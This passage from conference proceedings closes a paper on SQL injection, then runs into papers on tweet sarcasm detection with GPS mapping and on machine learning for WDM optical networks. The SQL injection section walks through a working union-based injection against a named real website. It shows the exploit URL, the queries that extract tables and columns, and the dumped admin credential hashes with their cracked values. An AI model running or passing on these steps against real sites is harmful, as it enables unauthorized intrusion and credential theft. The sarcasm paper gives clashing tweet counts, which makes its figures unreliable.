TBL_SHIP_METHODS, TBL_STATES, TBL_STATS, TBL_SUB_OPT, TBL_SUBSCRIBERS, TBL_TAX, TBL_WEBS,
TBL_WISHLIST, TBL_ZONE
* We got a table name, TBL_ADMIN, which may contain the username and password.
Now we must find the column names of the target table.

4.5 Step 5. Finding the Column Name from the Target Table
Command Used

group_concat(column_name)

from information_Schema.columns where table_name = (put here the hex value of the table name beginning with 0x, that is, TBL_ADMIN [try both upper case and lower case]) --+
*** To Convert the table name into the hex value: www.online-toolz.com
Implementation
---------------------
http://tncgroup.pk/content.php?Id=-2 union select 1,group_concat(column_name),3,4,5,6,7,8,9,10,11,12,13 from information_Schema.columns where table_name=0x74626c5f61646d696e --+
Note:
-------
hex value of tbl_admin : 74626c5f61646d696e (converted using online-toolz.com)
Output:
--------
we get the column names as: MAINID,PNAME,PLOGIN,PPASS,PSHOW
* Now we have to get the data from the columns, maybe from PLOGIN and PPASS, as these seem to be the login and password.
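As a quick illustration of the hex-encoding step above, a one-line Python check (a sketch, independent of the online tool just mentioned) reproduces the value used in the query:

# Encode the table name as the hex string expected after the 0x prefix.
print("tbl_admin".encode().hex())                     # -> 74626c5f61646d696e
print(bytes.fromhex("74626c5f61646d696e").decode())   # -> tbl_admin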

4.6 Step 6. Getting the Data from the Columns

Command Used
---------------------
group_concat(plogin,0x3a,ppass)   // 0x3a is the hex value of ':' and is placed between the column names to distinguish the username from the password
from tbl_admin --+
* Command 1 is used in place of the vulnerable column we found, and command 2 is used at the end, that is after 13, which is the total number of columns.
Output:
----------
21232F297A57A5A743894A0E4A801FC3:202CB962AC59075B964B07152D234B70
maybe admin/123
to encrypt/decrypt: hashkiller.co.uk
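The recovered values are MD5 digests; a short Python check (a sketch using the standard hashlib module) confirms the guessed plaintexts admin/123:

import hashlib

# MD5 digests of the guessed credentials, compared with the dumped hashes.
print(hashlib.md5(b"admin").hexdigest().upper())  # 21232F297A57A5A743894A0E4A801FC3
print(hashlib.md5(b"123").hexdigest().upper())    # 202CB962AC59075B964B07152D234B70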

5 Conclusion

The Structured Query Language injection attack technique is used for stealing data from a web server. In this paper, we have studied the types of SQL attacks, their techniques, prevention methods and methodologies. We have observed that every web application has a back end, and in the back end there is a data server/database. If an attacker can bypass the authentication process, get into the database and illegally view and grab information from it, this is called an injection attack. The SQLIA technique can be performed by a user by bypassing the login page through malicious SQL code or clauses entered into it. To prevent such attacks, developers should have basic knowledge of these techniques. In the future, we will try to extract new prevention methods to secure databases against these kinds of attackers, and we will carry out further research on web firewalls to protect web applications. Although various strategies have been developed to counter SQL injection attacks, more sophisticated, fault-tolerant and reliable algorithms can still be developed to provide better security to the system.

References

1. Shema, M. (2010). Seven Deadliest Web Application Attacks. Elsevier Inc., (pp. 47–69).
2. Halfond, W. G. J. & Orso, A. (2006). Preventing SQL injection attacks using Amnesia. In
Presented at the Proceedings of the 28th international conference on Software engineering
(ICSE), ACM, Shanghai, China, (vol. 11, pp. 795–798), May 20–28, (2006).
3. Alazab, A., & Khresiat, A. (2016) New strategy for mitigating of SQL injection attack.
International Journal of Computer Applications (IJCA), 154, 11.
4. Halfond, W. G., & Orso. A. (2005). Analysis and monitoring for neutralizing SQL-injection
attacks. In Proceedings of the 20th IEEE/ACM International Conference on Automated
Software Engineering.
5. Som, S., Sinha, S., & Kataria, R. (2016). Study on SQL injection attacks: Mode, detection and prevention. International Journal of Engineering Applied Sciences and Technology (IJEAST), 1(8), 212–220.
6. Dornseif, M. (2005). Common failures in internet applications. http://md.hudora.de/presentat
ions/2005-common-failures/dornseif-common-failures-(2005-05-5).pdf.
7. Patel, N. (2015). Implementation of pattern matching algorithm to defend SQLIA. In International Conference on Advanced Computing Technologies and Applications (ICACTA-2015), Procedia Computer Science, 45, 444–450. https://www.ptsecurity.com/ww-en/analytics/knowledge-base/how-to-prevent-sql-injection-attacks/.
8. Andreu, A. (2006). Professional Pen Testing for Web Applications. Wrox, 2, 113–120.

9. Chris, A. (2010). Advanced SQL injection in SQL server applications, vol. 9, p. 2. http://www.
nextgenss.com/papers/advanced_sql_injection.pdf (2002).
10. Stephen, J. F. (2005). SQL Injection attacks by example, vol. 3, pp. 3–5
11. Elmasri, R., & Navathe, S. B. (2011). Fundamentals of database systems (6th ed.). United
States of America: Addison-Wesley.
12. Nithya, V., Regan, R, & Vijayaraghavan, J. (2013). A survey on SQL injection attacks, their
detection and prevention techniques. International Journal Of Engineering And Computer
Science (IJECS), 2(4), 886–905.
13. Limei, M., et al. (2019). Research on SQL injection attack and prevention technology based on
web. In International Conference on Computer Network, Electronic and Automation (pp. 176–
179).
14. Su, G., et al. (2018) Research on SQL injection vulnerability attack model. In 5th IEEE
International Conference on Cloud Computing and Intelligence System (pp. 217–221).
Sentimental Analysis on Sarcasm
Detection with GPS Tracking

Mudita Sharan and M. Ravinder

Abstract Sentimental analysis, also known as opinion mining, is one of the major tasks of natural language processing (NLP). Sentimental analysis is a technique used to identify a person's sentiment, humour and emotion. Sarcastic comments imply what a person wants to say in a conflicting manner. Sarcasm is widely used across numerous informal communication and micro-blogging sites where individuals attack others, which makes it tricky to determine what a person actually means. For example, many sarcastic tweets give a positive impression, like "Technical talk right after lunch", yet describe an undesirable activity. A number of studies have been carried out on sarcasm. In this paper, feature extraction techniques and classifiers such as logistic regression, support vector machine (SVM) and random forest are used to recognize sarcasm in tweets obtained from the Twitter streaming API. The best classifier is picked and then combined with different pre-processing and filtering methods using sarcastic and non-sarcastic lexicon mapping to give the best possible precision. A GPS tracking system is used to collect the data and determine the locations from which the tweets are coming. The sarcastic and non-sarcastic dictionary is the key idea introduced in this paper.

Keywords Sarcasm detection · Sentiment analysis · Humor · Support vector machine · Natural language processing

M. Sharan (B)
Computer Science and Engineering Department, Institute of Engineering and Technology,
Lucknow, India
e-mail: Msharan.csed.cf@ietlucknow.ac.in
M. Ravinder
Computer Science and Engineering Department, Indira Gandhi Delhi Technical University For
Women, Delhi, India

© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 633
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_51

1 Introduction

Of late, social networking platforms such as Twitter, Instagram and Amazon have gained broad popularity and significance. Twitter is one of the biggest social platforms where individuals express their opinions, emotions and perspectives on ongoing events, for example through live tweets. Twitter permits registered users to send messages and then read the replies, which are termed tweets. Sarcasm is a particular difficulty faced in sentimental analysis. Twitter also enables various users to communicate their thoughts and conclusions, which in turn enables many organizations to learn what popular opinion of their products or services is and to give real-time customer help. Sarcasm is the communication of pessimistic sentiments using positive-sounding words; it also occurs when an individual wants to convey something different from what they say. Sarcasm is used not only for mockery but also for criticizing others, their ideas and so forth, which is why it is so widely used on Twitter. Sarcasm can be conveyed in different ways, such as direct conversation, speech or text. It can also be expressed through ratings by giving a lower number of stars.

Organizations continuously tap into social media to understand customer opinion about products and services and to give real-time customer support. From a research perspective, among the various problems in natural language processing (NLP), some are easy and some are hard. It is widely believed that tasks such as question answering, summarization and translation belong to the category of hard problems, and sarcasm detection is one more addition to this list. Sarcasm is a deliberate play on the part of a person, who plays with the language and its nuances to communicate something sarcastically. Hence, it is subtle in nature; it may come down to just a play of language, where a word, a punctuation mark or a phrase is placed here or there.

A GPS tracking system is used in such a way that once a comment is detected as sarcastic, GPS tracking is performed. The mechanism used is the global positioning system (GPS), which traces the journey of a mobile device or system while determining its accurate location. The recorded location data can be stored in the tracking device or transferred to an internet-connected gadget using the radio or satellite modem already embedded in the gadget unit. This tells us where more sarcastic comments are coming from so that they can be addressed, for example comments on politics, racism, etc. These capabilities are therefore combined with Twitter's geolocation information and the easy-to-use functionality of GeoCommons to create an interactive map of the racist tweets.

The contents of the paper are divided into different sections. Section 3 discusses the previous work done in sentimental analysis on sarcasm detection. Table 1 shows different sentimental analyses on sarcasm detection. Section 9 shows the experimental results, and finally the paper is concluded in Sect. 10.
Table 1 Different sentimental analyses on sarcasm detection

1. Topic: Sentiment analysis for sarcasm detection on streaming short text data. Author: Prasad et al. [1]. Methodology: POS training, POS testing, PBLGA testing. Task: to discover the exactness of the proposed model. Dataset: online review sites, media sites and other microblogging sites. Classification used: the PBLGA algorithm utilized 1.45 million tweets as its test data.
2. Topic: Sarcastic detection of tweets streamed in real time. Author: Bharti et al. [5]. Methodology: POS training, POS testing, PBLGA testing. Task: to discover the exactness of the proposed model. Dataset: online review sites, media sites and other microblogging sites. Classification used: the PBLGA algorithm utilized 1.45 million tweets as its test data.
3. Topic: Sarcasm detection in sentiment analysis. Author: Kaushik and Barot [6]. Methodology: support vector machine (SVM), logistic regression. Task: identifying sarcasm. Dataset: sarcasm-labelled corpus. Classification used: bag-of-words and features based on punctuation such as '!' and '?'.
4. Topic: A comprehensive study on sarcasm detection techniques in sentiment analysis. Author: Sindhu et al. [7]. Methodology: data collection, data pre-processing, polarity detection. Task: relating comments with tags. Dataset: Twitter and Amazon. Classification used: emoticons, punctuation marks, quotation marks.
5. Topic: Detection of sarcasm in text data using deep convolutional neural networks. Author: Mehndiratta et al. [8]. Methodology: data pre-processing and data preparation. Task: to identify a superior classifier among those utilized. Dataset: Twitter Streaming API. Classification used: word tokenization, POS tagging, stemming, lemmatization.
6. Topic: Recognition of sarcasm in tweets based on concept-level sentiment analysis and supervised learning approaches. Author: Tungthamthiti et al. [9]. Methodology: contradiction in sentiment score. Task: to find a superior classifier. Dataset: news article dataset. Classification used: pragmatic.
7. Topic: Sarcasm detection: a computational and cognitive study. Author: Bhattacharyya [10]. Methodology: data set, classifiers. Task: discover features that give a superior result. Dataset: original bilingual corpus. Classification used: lexical.

2 Literature Review

Prasad et al. [1] suggested a system to identify sarcastic and non-sarcastic tweets based on the slang and emoticons used in tweets. Their main concern was the quality of the slang and emoticon dictionary. These features were then compared across diverse classification algorithms such as random forest, gradient boosting, logistic regression (LogR), adaptive boosting and Gaussian Naïve Bayes to distinguish the sarcastic tweets obtained from the Twitter Streaming API. The best classification algorithm is selected and combined with various pre-processing and filtering strategies using emoticon and slang dictionary mapping to provide the best efficiency.

Parveen and Deshmukh [2] proposed an algorithm to distinguish sarcastic comments on Twitter using support vector machine (SVM) and maximum entropy algorithms. Initially, the authors divided their work into two datasets: one before adding the sarcastic tweets to the training data and the other after adding the sarcasm to the training data. Tagging was done using the Penn Treebank to match every word with its related linguistic form. The authors extracted features related to sentiment, punctuation, syntax, pattern and so on from the input data. After extracting the features, classification is done using the SVM and maximum entropy algorithms. Comparing these algorithms, maximum entropy gives higher precision than the support vector machine.

Jain et al. [3] suggested a system using the random forest algorithm along with weighted ensemble algorithms for identifying sarcastic tweets, with the help of a pragmatic classifier for the detection of emotion-based sarcasm. According to the authors, sarcasm is nothing but positive sentiment attached to a negative sentiment or a pessimistic circumstance. Precision as well as accuracy were examined to calculate the adequacy of the random forest classifier and the weighted ensemble algorithms, and the two gave the same accuracy when compared in the end.

Manohar and Kulkarni [4] proposed another methodology for sarcasm recognition based on NLP and a corpus-based approach. The authors' goal was to understand why a client is willing to post a sarcastic comment instead of just writing honest feedback. The authors gathered tweets from the Twitter site and implemented NLP methods such as tokenization, part-of-speech (PoS) tagging and lemmatization. The NLP procedures were applied to the tweets to retrieve activity words. The activity words retrieved from the tweets were matched with the collection of sarcasm information using semantic matching and graph-based matching, giving an average sarcasm score over the tweet data. With this average, the severity of sarcasm in the tweet data was analysed.

3 Related Researches

With progress in data mining and text mining algorithms, combined with the colossal amount of text data being created each day on a wide range of social media platforms such as Twitter, the possibility of governments and organizations trying to inspect opinions and sentiments is far more feasible now than at any other time. Table 1 shows the different sentimental analyses on sarcasm detection with their task, dataset, classification and methodology.

4 Methodologies of Sarcasm Detection

The fundamental methodologies of sarcasm detection can be stated as the following:


• ML approach
In the machine learning approach, ML is a subset of AI that provides statistical tools to explore the data and to understand it. There are three approaches: the first is supervised machine learning, the second is unsupervised learning and the third is reinforcement learning. In the supervised case, we have labelled data or some past data through which we can predict whether tweets are sarcastic or non-sarcastic. In unsupervised learning, by contrast, we solve clustering kinds of problems. Lastly, in reinforcement learning the model learns by interacting with an environment and receiving rewards for its actions. ML procedures like Naïve Bayes (NB), maximum entropy (ME) and support vector machines (SVM) have made incredible progress in text classification.
• Lexicon based methodology
The idea is that we use some manually defined rules to classify whether the review is positive or negative. In the lexicon-based methodology, we count, for each comment, how many positive and negative words are present. Then we calculate a score giving what percentage of the comment is sarcastic and what percentage is non-sarcastic (a minimal sketch of this scoring is given after this list).
• Deep Learning
Here, we want to train a network to make predictions. The starting point is the same as in the ML-based approach, as we need a labelled dataset, but the pre-processing is a bit different: in deep learning we treat a text as a time series. To train a network, we first have to bring all the documents into the same shape of numerical data representation, so that every sample has the same shape; therefore, we first encode each word with a number and then account for the fact that each document contains a different number of words.
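As referenced above, a minimal Python sketch of the lexicon-based scoring idea is shown below; the word lists and the percentage-style decision are illustrative assumptions, not the actual lexicon used in this paper.

# Minimal lexicon-based scoring: count positive/negative words per comment
# and turn the counts into a percentage score.
POSITIVE = {"great", "love", "wonderful", "nice"}
NEGATIVE = {"boring", "hate", "terrible", "waste"}

def lexicon_score(comment: str) -> float:
    words = comment.lower().split()
    pos = sum(w in POSITIVE for w in words)
    neg = sum(w in NEGATIVE for w in words)
    total = pos + neg
    return 100.0 * pos / total if total else 50.0  # % of positive lexicon words

comment = "I just love a technical talk right after lunch"
print(lexicon_score(comment))  # share of positive lexicon words in the comment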

5 Proposed Architecture

The proposed architecture follows the steps given below:


i. The foremost step is gathering the data so that the methodology can be applied, dividing the data into a training set and a test set. Since we are using a machine learning approach, we have labelled data, so whichever classifier we apply can take the labelled data and run its experiments. The Twitter API was used to collect the dataset.
ii. In the next step, the labelled data obtained from the Twitter API is pre-processed so that unnecessary words that are not needed can be removed. The pre-processing is done so that information like URLs, tagging and emoticons can be removed from the data (Fig. 1).
iii. After obtaining the pre-processed words of the tweets, the features required for the classification techniques are extracted. There are mainly three kinds of features: pragmatic, N-gram and hyperbolic. We use N-gram features for the extraction here.
iv. The obtained features are then given to the classifiers; the four classifiers take the features and start processing on the training set.
v. Once the classifiers have started processing the training data, the features of the test set, which the classifiers have not seen, are provided to them.
vi. Finally, the outcomes for the training dataset and the test dataset are captured. The plotting of the tweets is done, showing the areas from which most of the sarcastic tweets originate.
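A minimal sketch of steps ii and iii (assuming scikit-learn is available; the regular expressions and the unigram/bigram setting are illustrative choices, not the authors' exact pipeline) is given below.

import re
from sklearn.feature_extraction.text import CountVectorizer

def preprocess(tweet: str) -> str:
    # Remove URLs, @-mentions, hashtags and emoticon-like symbols.
    tweet = re.sub(r"http\S+|www\.\S+", " ", tweet)
    tweet = re.sub(r"[@#]\w+", " ", tweet)
    tweet = re.sub(r"[^a-zA-Z\s]", " ", tweet)
    return tweet.lower().strip()

tweets = ["Technical talk right after lunch #fun http://t.co/x",
          "Had a lovely time at the conference @friend"]
cleaned = [preprocess(t) for t in tweets]

# N-gram feature extraction (unigrams and bigrams here).
vectorizer = CountVectorizer(ngram_range=(1, 2))
features = vectorizer.fit_transform(cleaned)
print(features.shape)  # (number of tweets, number of n-gram features)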

Fig. 1 Proposed methodology



6 Sarcasm Detection Algorithm

STEP 1: Collected datasets of 33,000 tweets.


STEP 2: Pre-process the data.
STEP 3: Filtered emoticons, hashtags.
STEP 4: Stemming the remaining words.
STEP 5: Data feature engineered.
STEP 6: Unigrams.
STEP 7: Applied SVM classifier.
STEP 8: Applied Naïve Bayes Classifier.
STEP 9: Applied Decision Tree Classifier.
STEP 10: Tracking the location through a GPS locator.
STEP 11: Observing results with receiver operating characteristic (ROC) curves.

The accumulated tweets comprised 16,000 sarcastic tweets and 16,000 non-sarcastic tweets for testing sarcasm in sentimental analysis.
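A compact sketch of steps 5–11 (excluding the GPS step) is shown below; it assumes scikit-learn, a small placeholder corpus and default hyper-parameters, so it illustrates the flow rather than reproducing the paper's exact results.

from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.model_selection import train_test_split
from sklearn.svm import SVC
from sklearn.naive_bayes import MultinomialNB
from sklearn.tree import DecisionTreeClassifier
from sklearn.metrics import roc_auc_score

# Placeholder corpus: 1 = sarcastic, 0 = non-sarcastic.
texts = ["technical talk right after lunch", "i love waiting in long queues",
         "the food here is really good", "thanks for the quick delivery"] * 50
labels = [1, 1, 0, 0] * 50

X = TfidfVectorizer(ngram_range=(1, 1)).fit_transform(texts)   # unigram features
X_train, X_test, y_train, y_test = train_test_split(
    X, labels, test_size=0.35, random_state=42, stratify=labels)

classifiers = {
    "SVM": SVC(probability=True),
    "Naive Bayes": MultinomialNB(),
    "Decision Tree": DecisionTreeClassifier(),
}
for name, clf in classifiers.items():
    clf.fit(X_train, y_train)
    scores = clf.predict_proba(X_test)[:, 1]
    print(name, "AUC:", roc_auc_score(y_test, scores))  # compare ROC performance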

7 Evaluation

A. Verification input
The information used in the experiment was taken from Twitter with an official email. The total data gathered was 27,000 tweets, of which 13,000 were sarcastic tweets and 14,000 were real tweets. Of these, we took 65% as our training data and 35% as test data.
B. Assessment outcomes

The datasets [11] were assessed in light of the classifiers used. The classifiers used here are support vector classification, logistic regression, Naïve Bayes classification and decision tree.
Classification. For assessing our conclusions, we use a standard heuristic, namely the area under the curve (AUC) of the receiver operating characteristic (ROC) curve, for all classifiers.
(1) Support Vector Classification
We use SVM to separate our data into two parts, i.e., positive comments and negative comments, with a hyperplane; it creates two margin lines with some distance between them so that the points of the two classes are easily separable. Given a set of training examples, each marked as belonging to one of two categories (sarcastic and non-sarcastic tweets), the support vector machine training algorithm builds a model that assigns new examples to one category or the other, dividing them into two different parts (Fig. 2).

Fig. 2 SVM ROC

(2) Logistic Regression


We use it for binary classification. Based on the tweets, we categorize them into sarcastic and non-sarcastic. If the bag-of-words weight is more than 75%, the comment is classified as sarcastic; if it is less than 75%, it is classified as non-sarcastic (Fig. 3).
(3) Naïve Bayes Classification
Here, we apply conditional probability, in which two events are taken: sarcastic tweets as A and non-sarcastic tweets as B. Two cases arise: first, the probability of event A given that B has already occurred, and second, the probability of event B given that A has already occurred. Formula (1) is used:

P(A|B) = (P(B|A) × P(A)) / P(B)    (1)
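As a purely illustrative application of formula (1), assume P(A) = 0.5 (half of the collected tweets are sarcastic), P(B|A) = 0.3 (the probability of a given word pattern appearing in a sarcastic tweet) and P(B) = 0.2 (the overall probability of that pattern). Then P(A|B) = (0.3 × 0.5)/0.2 = 0.75, so a tweet containing that pattern would be classified as sarcastic; the numbers are assumptions for illustration only.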

Fig. 3 Logistic regression ROC

(4) Decision Tree Classification

We create a decision tree with the datasets we have collected. The target attribute here is the negative (sarcastic) comments (Figs. 4 and 5). We have analysed sarcastic and non-sarcastic tweets and plot the ROC curve for every classifier.
(5) GPS Tracking
The map uses a location quotient, which "demonstrates each state's number of election hate-speech tweets relative to its total number of tweets." Seven greyed-out states had no racist tweets. Interestingly, the greater part of those seven appear to be states that have lower Twitter use than the rest.

Fig. 4 Naïve bayes ROC

Fig. 5 Decision tree ROC



Fig. 6 Mapping racist tweets

Six of the greyed-out states (Alaska, Idaho, S. Dakota, Wyoming, Montana and Hawaii) had an exceptionally low number of tweets in general, albeit one (Rhode Island) had a noteworthy number of tweets (Fig. 6).
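A minimal sketch of how tweets can be grouped by location before mapping is shown below; it assumes each tweet is available as a Twitter API v1.1 JSON object whose optional 'place' field carries a human-readable place name, and the sample dictionaries are hand-made for illustration.

from collections import Counter

def tweets_per_place(sarcastic_tweets):
    # Count sarcastic tweets per tagged place; 'place' is present only when
    # the user geo-tagged the tweet, otherwise it is None.
    counts = Counter()
    for tweet in sarcastic_tweets:
        place = tweet.get("place")
        if place:
            counts[place["full_name"]] += 1
    return counts

sample = [
    {"text": "Great, another Monday", "place": {"full_name": "Austin, TX"}},
    {"text": "Love this traffic", "place": {"full_name": "Austin, TX"}},
    {"text": "So much fun at work", "place": None},
]
print(tweets_per_place(sample))  # Counter({'Austin, TX': 2})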

8 Testing Method

In the testing phase, we combine the classifier outputs to obtain the overall outcome: if any one algorithm flags a tweet as sarcastic, we do not need to check the other algorithms; the tweet is immediately declared sarcastic, saving time and improving efficiency. After obtaining the sarcastic tweets, the plotting is finally done through the GPS tracking system, which shows the areas prone to more sarcastic tweets.
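The short-circuit idea described above can be written in a few lines; the sketch below assumes three already-fitted scikit-learn-style classifiers and a 2-D feature array of shape (1, n_features) for a single tweet.

def is_sarcastic(feature_vector, fitted_classifiers):
    # Declare the tweet sarcastic as soon as any one classifier flags it;
    # any() stops evaluating the remaining classifiers, as described above.
    return any(clf.predict(feature_vector)[0] == 1 for clf in fitted_classifiers)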

9 Results

Metric       Current SVM   Current LogR   Existing SVM   Existing LogR
Accuracy     0.6876        0.66677        0.655          0.610
Precision    0.8677        0.92877        Unavailable    Unavailable

10 Conclusion and Future Scope

Sentimental analysis for sarcasm detection in social media shows what people's current opinions are about any real-time event or trend. In this paper, different algorithms were compared, and the classifier that gave the best outcome is the support vector machine. The tweets with sarcastic comments were then processed by a GPS locator, which tells us the exact areas from which the most sarcastic comments originated. In future, we can detect sarcastic comments in tweets that use hashtags and emoticons. Emoticons are generally used in the comment box to portray the emotions of a person, but knowing whether they indicate a positive or a negative comment is a strenuous task.

References

1. Prasad, A. G., Sanjana, S., Bhat, S. M., & Harish, B. S. (2017). Sentiment analysis for
sarcasm detection on streaming short text data. In 2nd International Conference on Knowledge
Engineering and Applications. IEEE.
2. Parveen, S., & Deshmukh, S. N. (2017). Opinion mining in twitter-sarcasm detection.
International Research Journal of Engineering and Technology (IRJET), 04(10), 201–204.
3. Jain, T., Agrwal, N., Goyal, G., & Agarwal, N. (2017). Sarcasm detection of tweets: a
comparative study. In Tenth International Conference on Contemporary Computing (IC3).
IEEE.
4. Manohar, M. Y., & Kulkarni, P. (2017). Improvement sarcasm analysis using NLP and corpus
based approach. In International Conference on Intelligence Computing and Control Systems
(ICICCS). IEEE.
5. Bharti, S. K., Vachha, B., Pradhan, R., Babu, K., & Jena, S. (2016). Sarcastic sentiment detection in tweets streamed in real time: A big data approach. Digital Communications and Networks, 2(3), 108–121.
6. Kaushik, S., & Barot, M. P. (2016). Sarcasm detection in sentiment analysis. IJARIIE, 2(6).
ISSN(O)-2395-4396.
7. Sindhu, C., Mandala, G. V., & Rao, V. (2018). A comprehensive study on sarcasm detection techniques in sentiment analysis. ResearchGate, June 2018.
8. Mehndiratta, P., Sachdeva, S., Soni, D. (2017). Detection of sarcasm in text data using deep
convolutional neural networks. Scalable Computing: Practice and Experience, 18(3).
9. Tungthamthiti, P., Shirai, K., & Mohd, M. (2017). Recognition of sarcasm in tweets based
on concept level sentiment analysis and supervised learning approaches. In 28th Pacific Asia
Conference on Language, Information and Computational (pp. 403–413).
10. Bhattacharyya, P. (2018). Sarcasm detection: A Computational and Cognitive study. CSE dept,
IIT Bombay and IIT Patna, Jan 2018.
11. www.internetlivestats.com/twitter_statistics/.
12. https://www.analyticsvidhya.com/blog/2017/09/naive-bayes-explained/.
13. Buscaldi, D., Rosso, P., & Reyes, A. (2013). From humour recognition to irony detection: The
figurative language of social media. Data & Knowledge Engineering April 2013
14. Barbieri, F., & Saggion, H. (2014). Automatic detection of irony and humour in twitter. In
Proceedings of the student Research Workshop at the 14th Conference of the European Chapter
of the association for Computational Linguistics (pp. 56–64). Gothenburg, Sweden.
15. Bifet, A., & Frank, E. (2015). Sentiment knowledge discovery in twitter streaming data. In
Discovery Science (pp. 1–5).

16. Forslid, E., & Wiken, N. (2015) Automatic irony-and sarcasm detection in social media.
ISSN:1401-5757 uptec f15 045.
17. Bamman, D., & Smith, N. A. (2016). Contextualized sarcasm detection on twitter. School of
Computer Science, Carnegie Mellon University
18. Joshi, A., Sharma, V., & Bhattacharyya, P. (2016). Harnessing context incongruity for sarcasm
detection. Res Gate 69–53.
19. Bindra, K. K., et al. (2016). Tweet Sarcasm: Mechanism of sarcasm detection in twitter.
International Journal Of Computer Science and Information Technologies (IJSCSIT), 7(1).
20. Mukherjee, S., & Bala, P. K. (2017). Detecting sarcasm in customer tweets : An NLP based
approach. Industrial Management & Data Systems, 117(6), 1109–1126.
21. Sreelakshmi, K., & Rafeeque, P. C. (2018). An effective approach for detection of sarcasm in
tweets. In International CET Conderence on Control, Communication and Computing (IC4)
(pp 337–382), IEEE, July 05–07.
22. Arora, M., & Kansal, V. (2019). Character level embedding with convolution neural network
for text normalization of unstructured data for twitter sentiment. Social Network Analysis and
Mining, 9(1), https://doi.org/10.1007/S13278-019-0557-Y, 2019.
Impact of Machine Learning Algorithms
on WDM High-Speed Optical Networks

Saloni Rai and Amit Kumar Garg

Abstract This paper focuses on comparing the various machine learning (ML) algo-
rithms that can be applicable in wavelength division multiplexing (WDM) optical
networks to provide better simulation outcomes. ML, combined with WDM optical
networks, helps in network control and resource management that are useful in
service provisioning and resource assignment. This paper gives a comprehensive
review of machine learning approaches in WDM optical networks concerning support
vector machine (SVM), K-nearest neighbour (K-NN), decision tree, random forest
and neural networks algorithms. These algorithms’ performances are compared in
terms of accuracy and AUC; further, the accuracy and AUC results show an average
outcome of 99% and 0.98, respectively. Simulation can be performed on MATLAB
and Net2plan tools using different data sets in terms of average accuracy and AUC for
WDM optical networks. This research’s future directions can be towards ML utiliza-
tion to provide optimal routing and wavelength assignment, increasing bandwidth
utilization to reduce control overheads, reduce computational complexity, security,
fault occurrence and monitoring schemes for WDM optical networks supporting 5G
applications.

Keywords Optical networks · Wavelength division multiplexing · Machine learning · Quality of transmission · 5G

1 Introduction

Machine learning is a technology that provides the system with the capability of
learning and improving automatically from experiences. The computer programs
are designed through machine learning in such a way that the data can be accessed
and learned on their own. It is a branch of artificial intelligence that is gaining huge
popularity in today’s technology [1]. The machines can execute the intellectual tasks
that were traditionally solved by humans through machine learning technology that

S. Rai (B) · A. K. Garg


Electronics and Communications Department, D.C.R.U.S.T, Murthal, Haryana, India

© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 645
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_52

provides complex mathematical and statistical tools. In all the networking fields, the
idea of automating complex tasks has been of great interest since the machines can
be given the tasks of designing and operating communication networks [2]. Also,
the implementation of deep learning algorithms, especially convolutional neural
networks (CNN), brings huge benefits to the medical field, where a huge number
of images are to be processed and analysed [3]. This paper focuses on reviewing
the applications of ML in optical networking-based technologies. Supervised and
unsupervised are the two commonly known types of machine learning algorithms.
A hybrid of supervised learning and unsupervised learning is introduced as semi-
supervised learning. Apart from these, [4] few other machine learning algorithms
are explained further.
(1) Supervised learning: The algorithm that trains the machine using examples,
also known as instances, is known as supervised learning. Training and Test
are the two sets of data provided for learning through this method. A training
set includes instances of input and output. These instances are used to discover
patterns relevant to new inputs and outputs given to the machine [5]. Supervised
learning is distinguished in classification and regression. Classification maps
the input space into pre-defined classes. The regression approach maps input
space across the real-value domain [6]. The most commonly used supervised
learning algorithms are:
(a) Decision Tree: The algorithm that groups the attributes by sorting them
based on their values is known as a decision tree. There are nodes and
branches available in each tree. Each node represents attributes in a group
that is to be classified. A value that is assigned to the node is repre-
sented by each branch. The general implementation of the decision tree
algorithm is presented in Fig. 1.
(b) Naïve Bayes: The text classification industry mostly uses Naïve Bayes
algorithm for classification and clustering. It works on the principle of
conditional probability.
(c) Support Vector Machine: This is another most widely used machine
learning algorithm which is applied mainly in classification. Margin
calculation is the basic principle of this algorithm [7]. Margins are drawn
in between the classes in such a manner that there is the maximum
distance in between the margin and classes, as a result of which the
classification error is minimum.
(2) Unsupervised learning: It is the algorithm that learns from unlabelled input without desired outputs. Input points that are close to each other can be clustered by this type of algorithm. The most commonly used unsupervised learning techniques are (a) k-means clustering and (b) principal component analysis [8]; a brief sketch of both is given after this list of algorithms.
(a) K-Means Clustering: In this technique, groups are created automatically
when applying clustering learning. A cluster includes items with similar
characteristics. Since k-distinct clusters are created, this algorithm is
known as k-means.

Fig. 1 General flowchart of decision tree algorithm [12]

(b) Principal Component Analysis (PCA): For making the computations


faster and easier, the dimensions of data are reduced using the PCA
algorithm.
(3) Semi-supervised learning: It is the algorithm that trains on both labelled and unlabelled data [9]. Firstly, the patterns are classified; further, the data is labelled as well as predicted in semi-supervised learning. Semi-supervised learning includes self-training and transductive SVM.
(a) Self-Training: A classifier is trained with some part of labelled data
and unlabelled data is given as input. In the training set, the unlabelled

points and predicted labels are added together, and further, the process
is iterated. The name of this classifier is self-training since it performs
learning on its own.
(b) Transductive SVM: This is an extension of the SVM algorithm. Both labelled and unlabelled data are included in TSVM. The unlabelled data is labelled in such a manner that the margin between the labelled and unlabelled data is maximum [10].
(4) Reinforcement learning: The algorithm that uses observations from the
surrounding environment by interacting with it to take actions that would
increase the reward or reduce the risks is known as reinforcement learning.
(5) Neural Network Learning: It is also commonly known as artificial neural
network (ANN). This algorithm is designed on the basic concept of neurons
residing in the human brain. There are three layers in this algorithm. The input
is given to the input layer. The input is processed by the second layer, known
as the hidden layer. Finally, the calculated output is forwarded to the output
layer.
(6) Ensemble Learning: This algorithm combines different individual learners to
generate only one learner. This individual learner can be any of the above-
mentioned learners such as neural network, decision tree or naïve Bayes [11].
The experimental simulations have shown that the performance of collective
learners is always better as compared to that of one individual learner.
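As noted under unsupervised learning above, a brief scikit-learn sketch of k-means clustering and PCA is given below; the synthetic data and the choice of k = 3 clusters and 2 principal components are assumptions made purely for illustration.

import numpy as np
from sklearn.cluster import KMeans
from sklearn.decomposition import PCA

rng = np.random.default_rng(0)
X = rng.normal(size=(300, 5))            # unlabelled samples, 5 features each

# k-means: group the samples into k distinct clusters of similar items.
kmeans = KMeans(n_clusters=3, n_init=10, random_state=0).fit(X)
print(kmeans.labels_[:10])               # cluster index assigned to each sample

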